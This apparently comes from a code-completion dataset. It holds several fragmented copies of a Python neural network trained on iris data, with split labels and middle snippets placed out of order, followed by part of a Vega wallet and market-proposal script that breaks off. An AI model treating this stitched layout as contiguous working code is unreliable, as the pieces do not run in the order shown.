print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.inputs = inputs
self.output = self.squash(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i]
return total + self.bias
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | init_weights_from_hidden_layer_neurons_to_output_layer_neurons | identifier_name |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def init_weights_from_hidden_layer_neurons_to_output_layer_neurons(self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.inputs = inputs
self.output = self.squash(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i] |
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | return total + self.bias
| random_line_split |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def init_weights_from_hidden_layer_neurons_to_output_layer_neurons(self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
| o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.inputs = inputs
self.output = self.squash(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i]
return total + self.bias
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for | conditional_block |
propose-vote-enact-market.py | #!/usr/bin/python3
"""
Script language: Python3
Talks to:
- Vega node (REST)
- Vega wallet (REST)
Apps/Libraries:
- REST: requests (https://pypi.org/project/requests/)
"""
# Note: this file uses smart-tags in comments to section parts of the code to
# show them as snippets in our documentation. They are not necessary to be
# included when creating your own custom code.
#
# Example of smart-tags:
# __something:
# some code here
# :something__
import requests
import time
import os
import helpers
import uuid
node_url_rest = os.getenv("NODE_URL_REST")
if not helpers.check_url(node_url_rest):
print("Error: Invalid or missing NODE_URL_REST environment variable.")
exit(1)
wallet_server_url = os.getenv("WALLETSERVER_URL")
wallet_name = os.getenv("WALLET_NAME")
if not helpers.check_var(wallet_name):
print("Error: Invalid or missing WALLET_NAME environment variable.")
exit(1)
wallet_passphrase = os.getenv("WALLET_PASSPHRASE")
if not helpers.check_var(wallet_passphrase):
print("Error: Invalid or missing WALLET_PASSPHRASE environment variable.")
exit(1)
# Help guide users against including api version suffix on url
wallet_server_url = helpers.check_wallet_url(wallet_server_url)
###############################################################################
# W A L L E T S E R V I C E #
###############################################################################
print(f"Logging into wallet: {wallet_name}")
# __login_wallet:
# Log in to an existing wallet
req = {"wallet": wallet_name, "passphrase": wallet_passphrase}
response = requests.post(f"{wallet_server_url}/api/v1/auth/token", json=req)
helpers.check_response(response)
token = response.json()["token"]
# :login_wallet__
assert token != ""
print("Logged in to wallet successfully")
# __get_pubkey:
# List key pairs and select public key to use
headers = {"Authorization": f"Bearer {token}"}
response = requests.get(f"{wallet_server_url}/api/v1/keys", headers=headers)
helpers.check_response(response)
keys = response.json()["keys"]
pubkey = keys[0]["pub"]
# :get_pubkey__
assert pubkey != ""
print("Selected pubkey for signing")
###############################################################################
# F I N D A S S E T S #
###############################################################################
# __get_assets:
# Request a list of assets available on a Vega network
url = f"{node_url_rest}/assets"
response = requests.get(url)
helpers.check_response(response)
# :get_assets__
# Debugging
# print("Assets:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
# __find_asset:
# Find settlement asset with name tDAI
found_asset_id = "UNKNOWN"
assets = response.json()["assets"]
for asset in assets:
if asset["details"]["symbol"] == "tDAI":
print("Found an asset with symbol tDAI")
print(asset)
found_asset_id = asset["id"]
break
# :find_asset__
if found_asset_id == "UNKNOWN":
print(
"tDAI asset not found on specified Vega network, please propose and "
"create this asset first"
)
exit(1)
###############################################################################
# G O V E R N A N C E T O K E N C H E C K #
###############################################################################
# Get the identifier of the governance asset on the Vega network
vote_asset_id = "UNKNOWN"
for asset in assets:
if asset["details"]["symbol"] == "tVOTE":
vote_asset_id = asset["id"]
break
if vote_asset_id == "UNKNOWN":
print(
"tVOTE asset not found on specified Vega network, please symbol name "
"check and try again"
)
exit(1)
# Request accounts for party and check governance asset balance
url = f"{node_url_rest}/parties/{pubkey}/accounts"
response = requests.get(url)
helpers.check_response(response)
# Debugging
# print("Accounts:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
voting_balance = 0
accounts = response.json()["accounts"]
for account in accounts:
if account["asset"] == vote_asset_id:
print("Found governance asset account")
print(account)
voting_balance = account["balance"]
break
if voting_balance == 0:
print(f"Please deposit tVOTE asset to public key {pubkey} and try again")
exit(1)
###############################################################################
# B L O C K C H A I N T I M E #
###############################################################################
# __get_time:
# Request the current blockchain time, and convert to time in seconds
response = requests.get(f"{node_url_rest}/time")
helpers.check_response(response)
blockchain_time = int(response.json()["timestamp"])
blockchain_time_seconds = int(blockchain_time / 1e9) # Seconds precision
# :get_time__
assert blockchain_time > 0
assert blockchain_time_seconds > 0
print(
f"Blockchain time: {blockchain_time} ({blockchain_time_seconds} seconds "
"past epoch)"
)
###############################################################################
# P R O P O S E M A R K E T #
###############################################################################
# STEP 1 - Propose a BTC/DAI futures market
# Further documentation on creating markets: | # https://docs.testnet.vega.xyz/docs/api-howtos/create-market/
# __prepare_propose_market:
# Compose a governance proposal for a new market
proposal_ref = f"{pubkey}-{uuid.uuid4()}"
